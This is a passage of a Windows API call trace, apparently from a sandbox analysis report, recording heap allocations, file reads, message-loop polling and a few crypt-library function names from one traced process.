lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0144.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0144.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0144.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.735] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0144.735] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xa377, lpOverlapped=0x0) returned 1 [0144.739] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0144.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0144.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0144.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0144.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0144.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f14010 [0144.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3dea020 | out: hHeap=0x970000) returned 1 [0144.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0144.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0144.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0144.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0144.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0144.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0144.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0144.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0144.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f1e390 [0144.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0144.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0144.749] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0144.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f14010 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0144.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0144.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0144.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0144.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0144.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0144.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0144.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.752] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0144.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0144.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0144.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0144.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f14010 [0144.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0144.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0144.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0144.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0144.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f28710 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0144.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0144.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0144.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0144.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0144.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0144.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0144.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0144.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0144.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0144.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0144.848] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0144.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0144.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0144.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0144.850] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.850] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0144.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.851] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0144.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0144.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.851] HeapFree 